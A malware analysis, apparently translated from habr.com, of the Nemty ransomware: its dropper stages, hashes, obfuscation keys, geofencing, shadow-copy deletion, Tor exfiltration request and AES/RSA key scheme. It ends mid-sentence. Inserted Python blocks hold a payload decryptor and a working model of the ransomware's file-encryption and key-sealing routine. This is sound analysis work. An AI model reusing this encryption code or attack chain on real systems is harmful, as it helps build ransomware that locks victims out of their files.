A new ransomware called Nemty has appeared on the network. It is believed to be the successor of GandCrab or Buran. This malware is distributed mainly from a fake PayPal website and has a number of interesting features. Details of how this ransomware works have not yet been made public.
The new Nemty ransomware was discovered by a user.
Several interesting facts about Nemty suggest that it was developed by the same people, or by cybercriminals linked to Buran and GandCrab:
- Like GandCrab, Nemty has an Easter egg: a link to a photo of Russian President Vladimir Putin with an obscene joke. The older GandCrab ransomware contained an image with the same text.
- The language artifacts in both programs point to the same Russian-speaking authors.
- It is the first ransomware to use an 8192-bit RSA key. This makes little practical sense: RSA-2048 is already far beyond anything that can be factored today, and even a 1024-bit key, although deprecated and no longer recommended for new systems, would already be out of reach for a victim trying to recover files without the private key.
- Like Buran, the ransomware is written in Object Pascal and compiled in Borland Delphi.
Static analysis
The malicious code runs in four stages. The first step is the execution of cashback.exe, a 32-bit PE executable of 1198936 bytes, on MS Windows. The code is written in Visual C++ and was compiled in 2013. It contains an archive that is unpacked automatically when Cashback.exe runs. The program uses the Cabinet.dll library and its functions FDICreate(), FDIDestroy() and others to extract the files from the .cab archive.
SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC
When the archive is unpacked, its files become visible.
Next, temp.exe is launched, a 32-bit PE executable of 307200 bytes for MS Windows. The code is written in Visual C++ and packed with the MPRESS packer, a packer similar to UPX.
SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD
The next step is ironman.exe. Once temp.exe is launched, it decrypts the data embedded in temp.exe and renames it to Ironman.exe, a 32-bit PE executable of 544768 bytes. The code is compiled in Borland Delphi.
SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88
The final step is relaunching the ironman.exe file. At runtime it transforms its code and executes itself from memory. This version of Ironman.exe is the malicious one and is responsible for the encryption.
Attack vector
At the moment, Nemty ransomware is distributed through the website pp-back.info.
The full infection chain can be seen at the following location:
Installation
Cashback.exe - the start of the attack. As already mentioned, Cashback.exe unpacks the .cab file it contains. It then creates the folder TMP4351$.TMP in the form %TEMP%\IXxxx.TMP, where xxx is a number from 001 to 999.
Next, a registry key of the following form is installed:
"rundll32.exe" "C:\Windows\system32\advpack.dll,DelNodeRunDLL32" "C:\Users\MALWAR~1\AppData\Local\Temp\IXPxxx.TMP"
It is used to delete the unpacked files. An IXP*.TMP folder under %TEMP% together with a DelNodeRunDLL32 cleanup entry is exactly what Microsoft's IExpress self-extracting packages leave behind, so the first stage is most likely an ordinary IExpress wrapper around the payload. Finally, Cashback.exe starts the temp.exe process.
Temp.exe is the second stage of the infection chain
It is the process launched by the Cashback.exe file and the second step of the malware's execution. It tries to download AutoHotKey, a tool for running scripts on Windows, and to execute the WindowSpy.ahk script located in the resource section of the PE file.
The WindowSpy.ahk script decrypts the temporary file into ironman.exe using the RC4 algorithm and the password IwantAcake. The key is derived from the password with the MD5 hash algorithm.
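The decryption step just described, as an added example written for this page rather than the script from the sample: an RC4 implementation driven by an MD5-derived key. The page does not say whether the 16 raw digest bytes or the 32-character hex digest serve as the RC4 key, so the helper tries both and keeps the variant that yields a PE image (the MZ header), which is the check an analyst would apply. The input blob below is constructed for the demo, not taken from the sample.

```python
# Added example, not the WindowSpy.ahk script itself: RC4 keyed with MD5(password),
# the scheme the analysis attributes to the temp.exe -> ironman.exe step.
import hashlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                                  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                     # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_password(password: str) -> bytes:
    """16-byte RC4 key = MD5(password), the derivation the page describes.
    Assumption: the raw digest is used; see recover_payload for the hex variant."""
    return hashlib.md5(password.encode()).digest()


def recover_payload(blob: bytes, password: str = "IwantAcake"):
    """Try both common ways of turning an MD5 into an RC4 key and return
    (variant_name, plaintext) for the first one that produces a PE file, else None."""
    md5 = hashlib.md5(password.encode())
    candidates = (("raw-digest", md5.digest()), ("hex-digest", md5.hexdigest().encode()))
    for name, key in candidates:
        plain = rc4(key, blob)
        if plain[:2] == b"MZ":                            # DOS header of a PE image
            return name, plain
    return None


# Constructed sample: a fake PE header encrypted with the raw-digest key, so the
# recovery routine has something to find. Not data from the real dropper.
SAMPLE_BLOB = rc4(key_from_password("IwantAcake"), b"MZ" + bytes(58) + b"PE\x00\x00")

if __name__ == "__main__":
    print(recover_payload(SAMPLE_BLOB))
```

When running this against the real temp.exe resource, the blob to feed in is the encrypted file that temp.exe drops, and a result of None means neither key derivation is right (for instance a different encoding of the password), not that the file is not a PE.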
Next, temp.exe launches the Ironman.exe process.
Ironman.exe - the third step
Ironman.exe reads the contents of the iron.bmp file and creates the Iron.txt file, which contains the cryptolocker that is launched next.
The malware then loads Iron.txt into memory and relaunches it as ironman.exe. After that, iron.txt is deleted.
Ironman.exe is the main part of the NEMTY ransomware and encrypts the files on the affected computer. The malware creates a mutex named "hate".
First it determines the computer's geographic location. Nemty looks up its IP address online and checks whether it belongs to one of the following countries:
- Russia
- Belarus
- Ukraine
- Kazakhstan
- Tajikistan
Presumably the developers do not want to attract the attention of law enforcement in their home countries, so they do not encrypt files in their "home" jurisdictions.
If the victim's IP address does not belong to the list above, the malware encrypts the user's data.
To prevent file recovery, shadow copies are deleted.
Next, a list of files and folders that are not encrypted, and a list of file extensions, is built:
- Windows
- $RECYCLE.BIN
- RSA
- NTDETECT.COM
- ntldr
- MSDOS.SYS
- IO.SYS
- boot.ini
- AUTOEXEC.BAT
- ntuser.dat
- Desktop.ini
- CONFIG.SYS
- BOOTSECT.BAK
- BOOTMGR
- ProgramData
- AppData
- osoft
- Common Files
log LOG CAB cab CMD cmd COM com cpl
CPL exe EXE ini INI dll DDL lnk LNK url
URL ttf TTF DECRYPT.txt NEMTY
The extension list carries both lower- and upper-case spellings of each entry, which suggests a case-sensitive comparison, and it contains DDL where DLL would be expected.
Obfuscation
To hide URLs and embedded configuration data, Nemty uses base64 and RC4 encoding with the keyword fuckav.
The decryption process, which uses CryptStringToBinary, looks like this:
Encryption
Nemty uses three layers of encryption:
- AES-128-CBC for files. The 128-bit AES key is generated randomly and is the same for all files. It is stored in the configuration file on the user's computer. The IV is generated randomly for each file and stored in the encrypted file.
- RSA-2048 for encrypting the file IV. A session key pair is generated. The session private key is stored in the configuration file on the user's computer.
- RSA-8192. The master public key is embedded in the program and is used to encrypt the configuration file, which stores the AES key and the RSA-2048 session private key.
One property of this layout is worth keeping in mind: in CBC mode the IV influences only the first 16-byte block, so the RSA-2048 wrapping of the IV protects just that block. Anyone who recovers the AES key (for example from the memory of the running Ironman.exe process, before the configuration has been sealed with the master key) could decrypt everything except the first block of every file without touching either RSA layer.
Nemty first generates 32 bytes of random data. The first 16 bytes are used as the AES-128-CBC key.
The second encryption algorithm is RSA-2048. The key pair is generated by the CryptGenKey() function and imported by the CryptImportKey() function.
Once the session key pair is generated, the public key is imported into the MS Cryptographic Service Provider.
Example of the generated session public key:
Next, the private key is imported into the CSP.
Example of the generated session private key:
And finally, RSA-8192. The master public key is stored in the .data section of the PE file in encrypted form (Base64 + RC4).
After Base64 decoding and RC4 decryption with the password fuckav, the RSA-8192 key looks like this:
As a result, the entire encryption process is as follows:
- Generate a 128-bit AES key that is used to encrypt all files.
- Create an IV for each file.
- Create an RSA-2048 session key pair.
- Decrypt the embedded RSA-8192 key using Base64 and RC4.
- Encrypt the file contents with the AES-128-CBC key from the first step.
- Encrypt the IV with the RSA-2048 session public key and Base64-encode it.
- Append the encrypted IV to the end of each encrypted file.
- Add the AES key and the RSA-2048 session private key to the configuration.
- Encrypt the configuration data, described in the section "Collection of information about the infected computer", with the master RSA-8192 public key.
- The encrypted file then looks as follows.
Example of an encrypted file:
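The sequence above, modelled end to end as an added example written for this page (it is not code from the page or from the Nemty sample): a per-victim AES-128 key, a per-file IV wrapped with an RSA-2048 session key and appended as a Base64 trailer, and the AES key plus session private key sealed with the attacker's master public key; the last function shows what the attacker's decryptor has to undo, which is why the files are unrecoverable without the master private key. It requires the third-party cryptography package. Three things are assumptions rather than facts from the page: the master key is generated at 2048 bits so the demo runs in seconds (the sample embeds an RSA-8192 key), the session private key is serialised as PEM rather than as a CryptoAPI key blob, and the configuration is split into RSA-sized blocks because PKCS#1 v1.5 cannot wrap more than k-11 bytes at once; how the sample lays out its encrypted configuration is not described on the page.

```python
# Added example (editor's illustration, not the sample's code) of Nemty's
# three-layer key hierarchy: AES-128-CBC per file, IV wrapped with an RSA-2048
# session key, config (AES key + session private key) wrapped with the master key.
# Requires the `cryptography` package.
# Assumptions not taken from the page: master key at 2048 bits instead of 8192,
# PEM serialisation of the session private key, and chunked RSA for the config.
import base64
import json
import os

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

PKCS1 = padding.PKCS1v15()  # the padding CryptoAPI's CryptEncrypt applies to RSA by default
TRAILER_LEN = 344           # Base64 length of one 256-byte RSA-2048 block


def _pad(data: bytes) -> bytes:
    n = 16 - len(data) % 16
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    return data[:-data[-1]]


def rsa_encrypt_chunked(pub, data: bytes) -> bytes:
    """PKCS#1 v1.5 wraps at most k-11 bytes per block, k = modulus size in bytes."""
    k = (pub.key_size + 7) // 8
    step = k - 11
    return b"".join(pub.encrypt(data[i:i + step], PKCS1) for i in range(0, len(data), step))


def rsa_decrypt_chunked(priv, blob: bytes) -> bytes:
    k = (priv.key_size + 7) // 8
    return b"".join(priv.decrypt(blob[i:i + k], PKCS1) for i in range(0, len(blob), k))


class NemtyLikeSession:
    """Per-victim state: one AES-128 key for every file, one RSA-2048 session pair."""

    def __init__(self, master_pub):
        self.master_pub = master_pub
        # Step 1 on the page: 32 random bytes, of which the first 16 become the AES key.
        self.aes_key = os.urandom(32)[:16]
        # Step 3: RSA-2048 session key pair (CryptGenKey in the sample).
        self.session_priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        self.session_pub = self.session_priv.public_key()

    def encrypt_file(self, plaintext: bytes) -> bytes:
        iv = os.urandom(16)                                   # step 2: fresh IV per file
        enc = Cipher(algorithms.AES(self.aes_key), modes.CBC(iv)).encryptor()
        body = enc.update(_pad(plaintext)) + enc.finalize()   # step 5: AES-128-CBC
        wrapped_iv = base64.b64encode(self.session_pub.encrypt(iv, PKCS1))  # step 6
        return body + wrapped_iv                              # step 7: trailer appended

    def config_blob(self) -> bytes:
        """Steps 8-9: AES key and session private key go into the config, and the
        config is sealed with the master public key. Only the attacker can open it."""
        pem = self.session_priv.private_bytes(
            serialization.Encoding.PEM,
            serialization.PrivateFormat.TraditionalOpenSSL,
            serialization.NoEncryption(),
        )
        cfg = {"key": base64.b64encode(self.aes_key).decode(), "pr_key": pem.decode()}
        return rsa_encrypt_chunked(self.master_pub, json.dumps(cfg).encode())


def attacker_decrypt_file(master_priv, config_blob: bytes, encrypted: bytes) -> bytes:
    """What the paid decryptor has to do: open the config with the master private key,
    unwrap the per-file IV with the session private key, then run AES-CBC."""
    cfg = json.loads(rsa_decrypt_chunked(master_priv, config_blob))
    aes_key = base64.b64decode(cfg["key"])
    session_priv = serialization.load_pem_private_key(cfg["pr_key"].encode(), password=None)
    body, trailer = encrypted[:-TRAILER_LEN], encrypted[-TRAILER_LEN:]
    iv = session_priv.decrypt(base64.b64decode(trailer), PKCS1)
    dec = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).decryptor()
    return _unpad(dec.update(body) + dec.finalize())


def round_trip(plaintext: bytes):
    """Run the whole scheme once; returns (encrypted_file, recovered_plaintext)."""
    master_priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    session = NemtyLikeSession(master_priv.public_key())
    encrypted = session.encrypt_file(plaintext)
    return encrypted, attacker_decrypt_file(master_priv, session.config_blob(), encrypted)


if __name__ == "__main__":
    # Constructed sample input, not a real victim file.
    enc, rec = round_trip(b"constructed sample document")
    print(len(enc), rec)
```

The trailer length is what lets a responder recognise a Nemty-style file layout: the ciphertext body is a multiple of 16 bytes, followed by a fixed-width Base64 string of the wrapped IV and then the FileID suffix described below.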
Collection of information about the infected computer
The ransomware collects the keys needed to decrypt the infected files, so the attacker is actually able to build a decryptor. In addition, Nemty collects user data such as the username, computer name and hardware profile.
It calls the GetLogicalDrives(), GetFreeSpace() and GetDriveType() functions to collect information about the drives of the infected computer.
The collected information is stored in the configuration file. Decoding the strings yields the list of parameters in the configuration file.
Configuration example for an infected computer:
The configuration template can be represented as follows:
{"General": {"IP":"[IP]", "Country":"[Country]", "ComputerName":"[ComputerName]", "Username":"[Username]", "OS":"[OS]", "isRU":false, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_", "UserID":"[UserID]", "key":"[key]", "pr_key":"[pr_key]
Nemty stores the collected data in JSON format in the file %USER%/_NEMTY_.nemty, with the FileID inserted into the name. The FileID is 7 characters long and generated randomly. Example: _NEMTY_tgdLYrd_.nemty. The FileID is also appended to the end of encrypted files.
Ransom note
Once the files are encrypted, a file named _NEMTY_[FileID]-DECRYPT.txt with the following content appears on the desktop:
The end of the file contains the encrypted information about the infected computer.
Network communication
The Ironman.exe process downloads the Tor Browser distribution from the following address:
Nemty then tries to send the configuration data to 127.0.0.1:9050, where it expects to find a working Tor Browser proxy. However, Tor Browser's SOCKS proxy listens on port 9150 by default; port 9050 is the default port of the standalone tor daemon on Linux and of the Expert Bundle on Windows. So no data reaches the attacker's server. Instead, the user can upload the configuration file manually to the Tor decryption service via the link provided in the ransom note.
Connecting to the Tor proxy:
An HTTP GET request is made to 127.0.0.1:9050/public/gate?data=
Here the open TCP ports used by the local Tor proxy can be seen.
Nemty decryption service on the Tor network:
The decryption service can be tested by uploading encrypted pictures (jpg, png, bmp).
After that, the attacker demands payment of the ransom. If it is not paid, the price is increased.
Conclusion
At the moment, files encrypted by Nemty cannot be decrypted without paying the ransom. This version of the ransomware shares features with Buran ransomware and the older GandCrab: compilation in Borland Delphi and an image containing the same text. It also appears to be the first encryptor to use an 8192-bit RSA key, which makes little practical sense, since a much shorter key (2048 bits is the usual minimum today) would already be unbreakable for the victim. Finally, and curiously, it tries to use the wrong port for the local Tor proxy service.
However, a solution
Source: habr.com